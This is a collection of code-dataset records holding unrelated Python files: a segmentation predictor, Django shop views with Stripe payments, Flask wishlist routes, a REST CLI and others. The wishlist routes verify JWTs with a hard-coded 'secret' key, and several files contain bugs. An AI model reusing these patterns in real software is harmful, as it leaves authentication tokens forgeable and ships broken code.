model.Table.attribute_definitions == [{'AttributeName': 'foo', 'AttributeType': 'N'}]\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"54674601","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function, division\nimport argparse\nimport caffe\nimport cv2\nimport json\nimport numba\nimport numpy as np\nfrom os.path import dirname, exists, join, splitext\nimport sys\nimport util\nimport time\n\nimport mxnet as mx\n__author__ = 'Bingbing'\n\n\ndef predict(dataset_name, model_prefix, epoch, dev, img_dir, output_dir):\n img_list = open(join(img_dir, 'valImage.lst'), 'r').readlines()\n\n symbol, arg_params, aux_params = mx.model.load_checkpoint(model_prefix, epoch)\n input_shape = (1, 3, 1396, 1396)\n mean_pixel = np.array([72.39, 82.91, 73.16])\n exe = symbol.simple_bind(ctx=dev,data=input_shape)\n for name in exe.arg_dict:\n if name != 'data' and name != 'softmax_label':\n arg_params[name].copyto(exe.arg_dict[name])\n\n for name in exe.aux_dict:\n aux_params.copyto(exe.aux_dict[name])\n\n label_margin = 186\n\n batch_size, num_channels, input_height, input_width = input_shape\n caffe_in = np.zeros(input_shape, dtype=np.float32)\n\n t_start = time.time()\n\n for i in xrange(len(img_list)):\n img_name = join(img_dir, img_list[i]).strip()\n image = cv2.imread(img_name, 1).astype(np.float32) - mean_pixel\n image_size = image.shape\n output_height = input_height - 2 * label_margin\n output_width = input_width - 2 * label_margin\n image = cv2.copyMakeBorder(image, label_margin, label_margin,\n label_margin, label_margin,\n cv2.BORDER_REFLECT_101)\n num_tiles_h = image_size[0] // output_height + \\\n (1 if image_size[0] % output_height else 0)\n num_tiles_w = image_size[1] // output_width + \\\n (1 if image_size[1] % output_width else 0)\n prediction = []\n for h in range(num_tiles_h):\n col_prediction = []\n for w in range(num_tiles_w):\n offset = [output_height * h,\n output_width * w]\n tile = image[offset[0]:offset[0] + input_height,\n offset[1]:offset[1] + input_width, :]\n margin = [0, input_height - tile.shape[0],\n 0, input_width - tile.shape[1]]\n tile = cv2.copyMakeBorder(tile, margin[0], margin[1],\n margin[2], margin[3],\n cv2.BORDER_REFLECT_101)\n caffe_in[0] = tile.transpose([2, 0, 1]) # form H*W*3 to 3*H*W\n #caffe_in[:, [0, 2], :, :] = caffe_in[:, [2, 0], :, :] # from BGR to RGB\n exe.arg_dict['data'][0:1, :, :, :] = mx.nd.array(caffe_in, dev)\n out = exe.forward()\n prob = out[0].asnumpy()[0]\n col_prediction.append(prob)\n col_prediction = np.concatenate(col_prediction, axis=2)\n prediction.append(col_prediction)\n prob = np.concatenate(prediction, axis=1)\n\n prediction = np.argmax(prob.transpose([1, 2, 0]), axis=2)\n #color_image = dataset.palette[prediction.ravel()].reshape(image_size)\n #color_image = cv2.cvtColor(color_image, cv2.COLOR_RGB2BGR)\n img_name = img_list[i].split('/')[-1]\n output_path = join(output_dir, splitext(img_name)[0]+'_output.png')\n print('Writing', output_path)\n cv2.imwrite(output_path, prediction)\n\n t_end = time.time()\n m, s = divmod(t_end-t_start, 60)\n h, m = divmod(m, 60)\n d, h = divmod(h, 24)\n print(\"Time: %d days, %d hours, %d minutes, %d seconds\"%(d, h, m, s))\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('dataset', nargs='?')\n # choices=['pascal_voc', 'camvid', 'kitti', 'cityscapes'])\n parser.add_argument('model_prefix', type=str, default=\"frontend\",\n help=\"the model prefix\")\n parser.add_argument('epoch', type=int, default=1,\n help='the epoch of loaded model parameters')\n parser.add_argument('img_dir', nargs='?', default='',\n help='directory to input images')\n parser.add_argument('output_dir', nargs='?', default='',\n help='directory to output')\n parser.add_argument('--gpu', type=int, default=-1,\n help='If -1 (default), CPU is used')\n\n args = parser.parse_args()\n\n if args.img_dir == '':\n raise IOError('Error: no directory to images')\n if args.gpu >= 0:\n dev = mx.gpu(args.gpu)\n print('Using GPU ', args.gpu)\n else:\n dev = mx.cpu()\n print('Using CPU')\n\n predict(args.dataset, args.model_prefix, args.epoch, dev, args.img_dir, args.output_dir)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"deep_learning/dilation10_by_mxnet/predictSegment.py","file_name":"predictSegment.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215892090","text":"\"\"\"\n 迭代Iteration:重复获取下一个元素的过程\n 可迭代对象Iterable:能够参与迭代的对象\n 具有__iter__函数\n 迭代器Iterator:执行迭代过程的对象\n 具有__next__函数\n\n\"\"\"\nmessage = \"我是齐天大圣孙悟空\"\n# for item in message:\n# print(item)\n\n# for 原理 - 迭代过程\n# 1. 获取迭代器对象\niterator = message.__iter__()\nwhile True:\n try:\n # 2. 获取下一个元素\n item = iterator.__next__()\n print(item)\n # 3. 如果停止迭代,则跳出循环\n except StopIteration:\n break\n# 面试题:能够被for循环的对象,必须具备什么条件?\n# 答:对象必须具备__iter__函数(必须是可迭代对象)\n\n","sub_path":"fancy_month01/day14_fancy/day14_teacher/demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"354907736","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('ideas/', views.IdeaListView.as_view(), name='list'),\n path('ideas//', views.IdeaDetailView.as_view()),\n path('random/', views.IdeaRandomView.as_view()),\n]\n\n","sub_path":"Web/ideasforcodding/ideas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"463328964","text":"from flask import Blueprint\nfrom flask import request\nimport json\nimport jwt\nimport time\nfrom ..services.wishlist_services import add_wishlist, get_wishlist\n\nwishlist = Blueprint('wishlist', __name__)\n\n\n@wishlist.route('/add/', methods=['POST'])\n#api to add product to user wishlist\ndef add_user_wishlist(product_id):\n auth_token = request.headers[\"auth_token\"]\n key = 'secret'\n data = jwt.decode(auth_token, key)\n if data[\"expire\"] > time.time():\n x = add_wishlist(data['user_id'], product_id)\n if x:\n return {\"status\": True, \"message\": \"product added to wishlist\"}\n else:\n return {\"status\": False, \"message\": \"server error\"}\n else:\n return{\"status\": True, \"message\": \"timed out\"}\n\n\n@wishlist.route('/')\n#api to get all products in user wishlist\ndef user_wishlist():\n auth_token = request.headers[\"auth_token\"]\n key = 'secret'\n data = jwt.decode(auth_token, key)\n if data[\"expire\"] > time.time():\n x = get_wishlist(data[\"user_id\"])\n if x:\n return{\"status\": True, \"products\": x}\n elif len(x) == 0:\n return {\"status\": True, \"message\": \"No items in wish list\"}\n else:\n return{\"status\": False, \"message\": \"server error\"}\n else:\n return{\"status\": True, \"message\": \"Timed Out\"}\n","sub_path":"flipkart/app/main/routes/wishlist_routes.py","file_name":"wishlist_routes.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"609132722","text":"import logging\nfrom time import sleep\nfrom d3a_api_client.aggregator import Aggregator\nfrom d3a_api_client.utils import get_area_uuid_from_area_name_and_collaboration_id\nfrom d3a_api_client.rest_market import RestMarketClient\n\n\nclass TestAggregator(Aggregator):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.is_finished = False\n self.fee_cents_per_kwh = 0\n\n def on_market_cycle(self, market_info):\n \"\"\"\n market_info contains market_info dicts from all markets\n that are controlled by the aggregator\n \"\"\"\n logging.info(f\"AGGREGATOR_MARKET_INFO: {market_info}\")\n if self.is_finished is True:\n return\n if \"content\" not in market_info:\n return\n batch_commands = {}\n self.fee_cents_per_kwh += 1\n logging.info(f\"{market_info}\")\n for area_event in market_info[\"content\"]:\n area_uuid = area_event[\"area_uuid\"]\n if area_uuid is None:\n continue\n if area_uuid not in batch_commands:\n batch_commands[area_uuid] = []\n batch_commands[area_uuid].append({\"type\": \"market_stats\",\n \"data\": {}})\n batch_commands[area_uuid].append({\"type\": \"grid_fees\",\n \"data\": {\"fee_const\": self.fee_cents_per_kwh}})\n if batch_commands:\n response = self.batch_command(batch_commands)\n logging.info(f\"Batch command placed on the new market: {response}\")\n\n def on_tick(self, tick_info):\n logging.debug(f\"Progress information on the device: {tick_info}\")\n\n def on_trade(self, trade_info):\n logging.debug(f\"Trade info: {trade_info}\")\n\n def on_finish(self, finish_info):\n self.is_finished = True\n\n\nsimulation_id = \"af779128-04a0-4af4-95a2-d8dc7c63079b\"\ndomain_name = \"http://localhost:8000\"\nwebsocket_domain_name = 'ws://localhost:8000/external-ws'\n\naggr = TestAggregator(\n simulation_id=simulation_id,\n domain_name=domain_name,\n aggregator_name=\"test_aggregator\",\n websockets_domain_name=websocket_domain_name\n)\n\nmarket_args = {\n \"simulation_id\": simulation_id,\n \"domain_name\": domain_name,\n \"websockets_domain_name\": websocket_domain_name\n}\n\nhouse_1_uuid = get_area_uuid_from_area_name_and_collaboration_id(\n market_args[\"simulation_id\"], \"House 1\", market_args[\"domain_name\"])\nmarket_args[\"area_id\"] = house_1_uuid\nhouse_1 = RestMarketClient(\n **market_args\n)\n\nhouse_2_uuid = get_area_uuid_from_area_name_and_collaboration_id(\n market_args[\"simulation_id\"], \"House 2\", market_args[\"domain_name\"])\nmarket_args[\"area_id\"] = house_2_uuid\nhouse_2 = RestMarketClient(\n **market_args\n)\nhouse_1.select_aggregator(aggr.aggregator_uuid)\nhouse_2.select_aggregator(aggr.aggregator_uuid)\n\nwhile not aggr.is_finished:\n sleep(0.5)\n","sub_path":"tests/test_market_aggregator.py","file_name":"test_market_aggregator.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"266582763","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport time\nimport click\nimport better_exceptions as be\nfrom flask.cli import FlaskGroup\nfrom utilities.logs import get_logger\nfrom utilities.processes import wait_socket\nfrom restapi import __package__ as current_package\n\nAPP = 'FLASK_APP'\nPORT = 'FLASK_PORT'\n\nlog = get_logger(__name__)\n\n\n@click.group()\n# @click.option('--debug/--no-debug', default=False)\n# def cli(debug):\ndef cli():\n # click.echo('Debug mode is %s' % ('on' if debug else 'off'))\n click.echo('*** RESTful HTTP API ***')\n\n\ndef main(args, another_app=None):\n\n if another_app is not None:\n os.environ[APP] = '%s.py' % another_app\n else:\n current_app = os.environ.get(APP)\n if current_app is None or current_app.strip() == '':\n os.environ[APP] = '%s.__main__' % current_package\n\n cli = FlaskGroup()\n options = {\n 'prog_name': 'restapi',\n 'args': args,\n }\n\n # cannot catch for CTRL+c\n cli.main(**options)\n\n # try:\n # cli.main(**options)\n # except SystemExit as e:\n # if str(e) == \"3\":\n # print(\"AH!\")\n # else:\n # # it looks like there is no Keyboard interrupt with flask\n # log.warning(\"Flask received: system exit\")\n # except BaseException as e:\n # # do not let flask close the application\n # # so we can do more code after closing\n # log.error(e)\n # log.warning('error type: %s' % type(e))\n\n\ndef flask_cli(options=None):\n log.info(\"Launching the app\")\n from restapi.server import create_app\n # log.warning(\"TEST\")\n if options is None:\n options = {'name': 'RESTful HTTP API server'}\n app = create_app(**options)\n app.run(host='0.0.0.0', threaded=True)\n else:\n create_app(**options)\n # app.run(debug=False)\n log.warning(\"Completed\")\n\n\ndef starting_up():\n from utilities import processes\n return processes.find(\n current_package,\n suffixes=['wait', 'init'],\n local_bin=True\n )\n\n\n@cli.command()\n# @click.option(\n# '--wait/--no-wait', default=False, help='Wait for startup to finish')\n# def launch(wait):\ndef launch():\n \"\"\"Launch the RAPyDo-based HTTP API server\"\"\"\n args = [\n 'run',\n '--host', '0.0.0.0',\n '--port', os.environ.get(PORT),\n '--reload',\n '--no-debugger',\n '--eager-loading',\n '--with-threads'\n ]\n\n if starting_up():\n log.exit(\"Please wait few more seconds: resources still starting up\")\n else:\n main(args)\n log.warning(\"Server shutdown\")\n\n\n@cli.command()\n@click.option('--services', '-s', multiple=True, default=['postgres'])\ndef verify(services):\n \"\"\"Verify connected service\"\"\"\n from restapi.services.detect import detector\n\n for service in services:\n myclass = detector.services_classes.get(service)\n if myclass is None:\n log.exit(\"Service \\\"%s\\\" was NOT detected\" % service)\n log.info(\"Verifying service: %s\", service)\n host, port = get_service_address(\n myclass.variables, 'host', 'port', service)\n wait_socket(host, port, service)\n\n log.info(\"Completed successfully\")\n\n\n@cli.command()\n@click.option('--wait/--no-wait', default=False, help='Wait for DBs to be up')\ndef init(wait):\n \"\"\"Initialize data for connected services\"\"\"\n if wait:\n mywait()\n\n log.info(\"Initialization requested\")\n flask_cli({'name': 'Initializing services', 'init_mode': True})\n\n\n@cli.command()\ndef wait():\n \"\"\"Wait critical service(s) startup\"\"\"\n mywait()\n\n\ndef get_service_address(variables, host_var, port_var, service):\n\n host = variables.get(host_var)\n # if host is None:\n # log.warning(\"Unable to find HOST variable for %s\", service)\n # for k in myclass.variables:\n # log.critical(myclass.variables)\n # if k.endswith(\"_host\"):\n # host = myclass.variables.get(k)\n # log.info(\"Using %s as HOST variable for %s\", k, service)\n if host is None:\n log.exit(\n \"Cannot find any variable matching %s for %s\", host_var, service)\n\n port = variables.get(port_var)\n # if port is None:\n # log.warning(\"Unable to find PORT variable for %s\", service)\n # for k in myclass.variables:\n # if k.endswith(\"_port\"):\n # port = myclass.variables.get(k)\n # log.info(\"Using %s as PORT variable for %s\", k, service)\n\n if port is None:\n log.exit(\n \"Cannot find any variable matching %s for %s\", port_var, service)\n\n log.debug(\"Checking address: %s:%s\", host, port)\n\n return host, int(port)\n\n\ndef mywait():\n \"\"\"\n Wait for a service on his host:port configuration\n basing the check on a socket connection.\n\n NOTE: this could be packaged as a `waiter` cli utility probably\n p.s. could that be done with rapydo-utils maybe?\n pp.ss. could rapydo utils be python 2.7+ compliant?\n \"\"\"\n from restapi.services.detect import detector\n\n for name, myclass in detector.services_classes.items():\n\n if name == 'authentication':\n continue\n\n if name == 'celery':\n host, port = get_service_address(\n myclass.variables, 'broker_host', 'broker_port', name)\n\n wait_socket(host, port, name)\n\n host, port = get_service_address(\n myclass.variables, 'backend_host', 'backend_port', name)\n\n wait_socket(host, port, name)\n else:\n host, port = get_service_address(\n myclass.variables, 'host', 'port', name)\n\n wait_socket(host, port, name)\n\n\n@cli.command()\n@click.confirmation_option(help='Are you sure you want to drop data?')\ndef clean():\n \"\"\"Destroy current services data\"\"\"\n flask_cli({'name': 'Removing data', 'destroy_mode': True})\n\n\n@cli.command()\ndef forced_clean():\n \"\"\"DANGEROUS: Destroy current data without asking yes/no \"\"\"\n flask_cli({'name': 'Removing data', 'destroy_mode': True})\n\n\n@cli.command()\n@click.option(\n '--wait/--no-wait', default=False, help='Wait for startup to finish')\n@click.option(\n '--core/--no-core', default=False,\n help='Test for core instead of vanilla code')\ndef tests(wait, core):\n \"\"\"Compute tests and coverage\"\"\"\n\n if wait:\n while starting_up():\n log.debug('Waiting service startup')\n time.sleep(5)\n\n log.debug(\"Starting unit tests: %s\", be)\n\n # launch unittests and also compute coverage\n # TODO: convert the `pyunittests` script from the docker image into python\n from utilities.basher import BashCommands\n bash = BashCommands()\n log.warning(\n \"Running all tests and computing coverage.\\n\" +\n \"This might take some minutes.\"\n )\n\n # FIXME: does not work\n # use the 'template' dir found in /code\n parameters = []\n # from utilities import helpers\n # basedir = helpers.latest_dir(helpers.current_fullpath())\n if core:\n parameters.append(current_package)\n # import glob\n # if 'template' in glob.glob('*'):\n # from restapi import __package__ as current_package\n # parameters.append(current_package)\n\n output = bash.execute_command(\n \"pyunittests\",\n parameters=parameters, catchException=True, error_max_len=-1)\n\n log.info(\"Completed:\\n%s\", output)\n","sub_path":"restapi/__commands__.py","file_name":"__commands__.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"345960880","text":"\nfrom django.http.response import JsonResponse # new\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views.generic import ListView, DetailView, View, TemplateView\nfrom .forms import CheckoutForm , CouponForm , RefundForm , PaymentForm\nfrom .models import Item, OrderItem, Order, Address, Payment, Coupon , Refund, UserProfile\nfrom django.utils import timezone\nfrom django.http import HttpResponse, request\nfrom django_countries.templatetags import countries\nfrom django.conf import settings\nimport random\nimport string\nimport stripe\nfrom django.db.models import Q, query # new\n\n\nstripe.api_key = settings.STRIPE_SECRET_KEY\n\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=20))\n\n\n# `source` is obtained with Stripe.js; see https://stripe.com/docs/payments/accept-a-payment-charges#web-create-token\n\n\n\n# Create your views here.\n\ndef products(request):\n context={\n 'item':Item.objects.all()\n }\n return render(request,'products.html',context)\n\ndef is_valid_form(values):\n valid = True\n for field in values:\n if field=='':\n valid=False\n return valid\n\n\n\nclass checkoutView(View):\n def get(self,*args,**kwargs):\n try:\n order= Order.objects.get(user= self.request.user, ordered=False)\n form= CheckoutForm()\n context={\n 'form':form,\n 'couponform':CouponForm() ,\n 'order':order,\n 'DISPLAY_COUPON_FORM ': True\n }\n shipping_address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='S',\n default= True\n )\n if shipping_address_qs.exists():\n context.update({'default_shipping_address':shipping_address_qs[0]})\n\n billing_address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='B',\n default= True\n )\n if billing_address_qs.exists():\n context.update({'default_billing_address':billing_address_qs[0]})\n\n \n return render (self.request, 'checkout.html',context)\n except ObjectDoesNotExist:\n messages.info(self.request,\"You don not have an active order\")\n return redirect(\"core:checkout\")\n\n \n def post(self,*args,**kwargs):\n form= CheckoutForm(self.request.POST or None)\n try:\n order=Order.objects.get(user=self.request.user,ordered=False )\n if form.is_valid():\n\n use_default_shipping= form.cleaned_data.get(\"use_default_shipping\")\n if use_default_shipping:\n print(\"Using default shipping address\")\n address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='S',\n default= True\n )\n if address_qs.exists():\n shipping_address= address_qs[0]\n order.shipping_address= shipping_address\n order.save()\n else:\n messages.info(self.request, \"No default shipping address availbale!\")\n return redirect(\"core:checkout\")\n else:\n print(\"User intered a new shipping address\")\n\n\n shipping_address1= form.cleaned_data.get(\"shipping_address\")\n shipping_address2=form.cleaned_data.get(\"shipping_address2\")\n shipping_country=form.cleaned_data.get(\"shipping_country\")\n shipping_zip=form.cleaned_data.get(\"shipping_zip\")\n if is_valid_form([shipping_address1,shipping_country, shipping_zip ]):\n \n \n shipping_address= Address(\n user=self.request.user,\n street_address=shipping_address1,\n apartment_address=shipping_address2,\n country=shipping_country,\n zip=shipping_zip,\n address_type=\"S\"\n )\n shipping_address.save()\n order.shipping_address= shipping_address\n order.save()\n set_default_shipping = form.cleaned_data.get(\"set_default_shipping\") \n if set_default_shipping:\n shipping_address.default= True\n shipping_address.save()\n else:\n messages.info(self.request, \"Please fill the required shipping address fields \") \n\n\n use_default_billing= form.cleaned_data.get(\"use_default_billing\")\n same_billing_address= form.cleaned_data.get(\"use_default_billing\")\n\n if same_billing_address:\n billing_address= shipping_address\n billing_address.pk= None \n billing_address.save()\n billing_address.address_type= 'B'\n billing_address.save()\n order.billing_address= billing_address\n order.save()\n\n\n\n elif use_default_billing:\n print(\"Using default billing address\")\n address_qs= Address.objects.filter(\n user=self.request.user,\n address_type='B',\n default= True\n )\n if address_qs.exists():\n billing_address= address_qs[0]\n order.billing_address= billing_address\n order.save()\n else:\n messages.info(self.request, \"No default billing address availbale!\")\n return redirect(\"core:checkout\")\n else:\n print(\"User intered a new billing address\")\n\n\n billing_address1= form.cleaned_data.get(\"billing_address\")\n billing_address2=form.cleaned_data.get(\"billing_address2\")\n billing_country=form.cleaned_data.get(\"billing_country\")\n billing_zip=form.cleaned_data.get(\"billing_zip\")\n if is_valid_form([billing_address1,billing_country, billing_zip ]):\n \n \n billing_address= Address(\n user=self.request.user,\n street_address=billing_address1,\n apartment_address=shipping_address2,\n country=billing_country,\n zip=billing_zip,\n address_type=\"B\"\n )\n billing_address.save()\n order.billing_address= billing_address\n order.save()\n set_default_billing = form.cleaned_data.get(\"set_default_billing\") \n if set_default_billing:\n billing_address.default= True\n billing_address.save()\n else:\n messages.info(self.request, \"Please fill the required billing_address fields \") \n\n payment_option=form.cleaned_data.get(\"payment_option\")\n \n\n\n # to do redirect to payment options \n if payment_option== 'S':\n return redirect(\"core:payment\", payment_option='stripe')\n elif payment_option== 'P': \n return redirect(\"core:payment\", payment_option='paypal')\n else:\n messages.warning(self.request, \"Invalid payment option selected!\")\n return redirect(\"core:checkout\")\n\n\n \n messages.warning(self.request, \"Failed Checkout!\")\n return redirect(\"core:checkout\")\n except ObjectDoesNotExist :\n messages.error(\" you dont have an active order \")\n return redirect(\"core:order_summary\")\n\n\nclass PaymentView(View):\n def get(self,*agrs,**kwargs):\n order= Order.objects.get(user=self.request.user, ordered=False)\n if order.billing_address:\n context={\n 'order':order,\n 'DISPLAY_COUPON_FORM ': False\n }\n userprofile=self.request.user.userprofile\n if userprofile.one_click_purchasing:\n cards= stripe.Customer.list_sources(\n userprofile.stripe_customer_id,\n limit=3,\n object='card'\n\n )\n card_list= cards['data']\n if len(card_list) > 0:\n # update the context with the default card \n context.update({\n 'card':card_list[0]\n })\n\n return render(self.request, 'payment.html', context)\n else:\n messages.warning(\" you have not added a billing address! \")\n return redirect(\"core:checkout\")\n\n\n def post(self,*agrs,**kwargs):\n order= Order.objects.get(user=self.request.user, ordered=False)\n form = PaymentForm(self.request.POST)\n userprofile= UserProfile.objects.get(user=self.request.user)\n if form.is_valid():\n token=self.request.POST.get('stripetoken')\n save= form.cleaned_data.get(\"save\")\n use_default =form.cleaned_data.get(\"use_default\")\n if save:\n #allow to fetch card\n if not userprofile.stripe_customer_id:\n customer= stripe.Customer.create(\n email= self.request.user.email,\n source=token\n )\n userprofile.stripe_customer_id= customer['id']\n userprofile.one_click_purchasing= True\n userprofile.save()\n else:\n stripe.Customer.create_source(\n userprofile.stripe_customer_id,\n source= token\n\n )\n\n\n amount= int(order.get_total()), # this values is in cents\n\n try:\n if use_default:\n # Use Stripe's library to make requests...\n charge= stripe.Charge.create(\n amount= amount,\n currency=\"EGP\",\n source=token,\n customer=userprofile.stripe_customer_id\n )\n\n else:\n charge= stripe.Charge.create(\n amount= amount,\n currency=\"EGP\",\n source=token,\n \n )\n\n payment=Payment()\n payment.stripe_charge_id= charge['id']\n payment.user= self.request.user\n payment.amount= order.get_total()\n payment.save()\n\n #asign payment to the order\n\n order_items=order.items.all()\n order_items.update(ordered=True)\n for item in order_items:\n item.save()\n\n order.ordered=True\n order.payment= payment\n #TODO: asign ref_code\n order.ref_code = create_ref_code()\n order.save()\n messages.success(\"your order was successful!\")\n return redirect('/')\n except stripe.error.CardError as e:\n # Since it's a decline, stripe.error.CardError will be caught\n body=e.json_body\n err= body.get('error',{})\n messages.warning(self.request, f\"{err.get('message')}\")\n return redirect('/')\n\n \n except stripe.error.RateLimitError as e:\n # Too many requests made to the API too quickly\n messages.warning(self.request, \"RateLimitError\")\n return redirect('/')\n\n except stripe.error.InvalidRequestError as e:\n # Invalid parameters were supplied to Stripe's API\n messages.warning(self.request, \"InvalidRequestError\")\n return redirect('/')\n\n except stripe.error.AuthenticationError as e:\n # Authentication with Stripe's API failed\n # (maybe you cleaned API keys recently)\n messages.warning(self.request, \" Not Authenticated\" )\n return redirect('/')\n\n except stripe.error.APIConnectionError as e:\n # Network communication with Stripe failed\n messages.warning(self.request, \"Network Error\" )\n return redirect('/')\n\n except stripe.error.StripeError as e:\n # Display a very generic error to the user, and maybe send\n # yourself an email\n messages.warning(self.request,\" something went wrong. you were not charged, please try agian. \")\n return redirect('/')\n\n except Exception as e:\n # send an email to ourselves\n messages.warning(self.request,\" A serious error occurred \")\n return redirect('/')\n\n \n \n #create the payment\n \n\n\nclass HomeView(ListView):\n model= Item\n paginate_by=8\n template_name='home.html'\n\n\nclass OrderSummaryView(LoginRequiredMixin, View):\n def get(self,*args,**kwargs):\n try:\n order=Order.objects.get(user=self.request.user,ordered=False )\n context={\n 'object': order\n }\n return render(self.request,'order_summary.html',context)\n except ObjectDoesNotExist :\n messages.error(\" you dont have an active order \")\n return redirect(\"/\")\n \n \n\nclass ItemDetailView(DetailView):\n model=Item\n template_name='product.html'\n\n\n\n@login_required\ndef add_to_cart(request, slug):\n item = get_object_or_404( Item, slug=slug)\n order_item, create = OrderItem.objects.get_or_create(\n item = item, \n user=request.user,\n ordered=False\n \n \n )\n order_qs=Order.objects.filter(user= request.user, ordered=False)\n if order_qs.exists():\n order= order_qs[0]\n #check if the order_item in the order\n if order.items.filter(item__slug= item.slug).exists():\n order_item.quantity +=1\n order_item.save()\n messages.info(request,\"this item quantity was updated\")\n return redirect(\"core:order-summary\")\n else:\n \n order.items.add(order_item)\n messages.info(request,\"this item was added to your Cart.\")\n return redirect(\"core:order-summary\" )\n else:\n ordered_date= timezone.now()\n order=Order.objects.create(user= request.user, ordered_date= ordered_date)\n order.items.add(order_item)\n messages.info(request,\"this item was added to your Cart.\")\n return redirect(\"core:order-summary\" )\n\n\n@login_required\ndef remove_from_cart(request,slug):\n item = get_object_or_404( Item, slug=slug)\n order_qs=Order.objects.filter(\n user= request.user,\n ordered=False)\n if order_qs.exists():\n order= order_qs[0]\n #check if the order_item in the order\n if order.items.filter(item__slug= item.slug).exists():\n order_item=OrderItem.objects.filter(\n item = item, \n user=request.user,\n ordered=False\n )[0]\n \n order.items.remove(order_item)\n messages.info(request,\"this item was removed to your Cart.\")\n else: \n messages.info(request,\"this item was not in your Cart.\") \n return redirect( \"core:order-summary\" )\n \n else:\n messages.info(request,\"You don not have an active order\")\n return redirect(\"core:product\", slug=slug )\n\n \n return redirect(\"core:product\", slug=slug )\n\n@login_required\ndef remove_single_item_from_cart(request,slug):\n item = get_object_or_404( Item, slug=slug)\n order_qs=Order.objects.filter(\n user= request.user,\n ordered=False)\n if order_qs.exists():\n order= order_qs[0]\n #check if the order_item in the order\n if order.items.filter(item__slug= item.slug).exists():\n order_item=OrderItem.objects.filter(\n item = item, \n user=request.user,\n ordered=False\n )[0]\n if order_item.quantity> 1:\n order_item.quantity -=1\n order_item.save()\n else:\n order.items.remove(order_item)\n \n messages.info(request,\"this item quantity was updated.\")\n return redirect(\"core:order-summary\" )\n else: \n messages.info(request,\"this item was not in your Cart.\") \n return redirect(\"core:product\", slug=slug )\n \n else:\n messages.info(request,\"You don not have an active order\")\n return redirect(\"core:product\", slug=slug )\n\n \n return redirect(\"core:product\", slug=slug )\n\n\n\n\ndef get_coupon(request,code):\n \n try:\n coupon= Coupon.objects.get(code=code)\n return coupon\n\n \n except ObjectDoesNotExist:\n messages.info(request,\"This coupon dose not exsit!\")\n return redirect(\"core:checkout\")\n\n\n\nclass AddCouponView (View ):\n def post(self,*args,**kwargs):\n\n if request.method == 'POST':\n form= CouponForm(self.request.POST or None )\n if form.is_valid():\n try:\n code= form.cleaned_data.get(\"code\")\n order= Order.objects.get(user= self.request.user, ordered=False)\n order.coupon=get_coupon(self.request,code)\n order.save()\n messages.success(self.request,\"successfuly added Coupon!\")\n return redirect(\"core:checkout\")\n \n\n \n except ObjectDoesNotExist:\n messages.info(request,\"You don not have an active order\")\n return redirect(\"core:checkout\")\n #TODO: raise error \n return None \n\n\nclass RequestRefundView(View):\n def get(self,*args,**kwargs):\n form = RefundForm()\n context={\n 'form':form \n }\n return render(self.request,'request_refund.html', context )\n\n\n def post(self,*args,**kwargs):\n form = RefundForm(self.request.POST)\n if form.is_valid():\n ref_code = form.cleaned_data.get(\"ref_code\")\n message = form.cleaned_data.get(\"message\")\n email = form.cleaned_data.get(\"email\")\n # edit the order\n try:\n order = Order.objects.get(ref_code=ref_code) \n order.refund_requested = True\n order.save()\n\n\n\n #store the refund\n refund = Refund()\n refund.order = order \n refund.reason = message\n refund.email = email\n refund.save()\n messages.info(self.request,\"Your request was received.\")\n return redirect(\"core:request-refund\")\n except ObjectDoesNotExist:\n messages.info(self.request,\"This order dose not exist.\")\n return redirect(\"core:request-refund\")\n\n\nclass SearchView(TemplateView):\n\n model = Item\n template_name = 'search_results.html'\n def get_context_data(self, **kwargs):\n context= super().get_context_data(**kwargs)\n #kw= self.request.GET[\"Keyword\"]\n kw= self.request.GET.get(\"Keyword\")\n #print(kw,\"..................................\")\n results= Item.objects.filter(\n Q(title__icontains=kw)|Q(description__icontains=kw)|Q(category__icontains=kw)\n )\n context[\"results\"] = results\n return context\n\n \n\n \n \n \n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79634225","text":"# Copyright 2018,2019 by MPI-SWS and Data-ken Research. Licensed under Apache 2.0. See LICENSE.txt.\nfrom setuptools import setup, find_packages\n\nimport sys\nsys.path.insert(0, 'dataworkspaces')\nfrom dataworkspaces import __version__\n\nwith open(\"README.rst\", \"r\") as f:\n long_description = f.read()\nsetup(\n name='dataworkspaces',\n version=__version__,\n author=\"Max Plack Institute for Software Systems, Data-ken Research\",\n author_email='jeff@data-ken.org',\n description=\"Easy management of source data, intermediate data, and results for data science projects\",\n long_description=long_description,\n long_description_content_type=\"text/x-rst\",\n 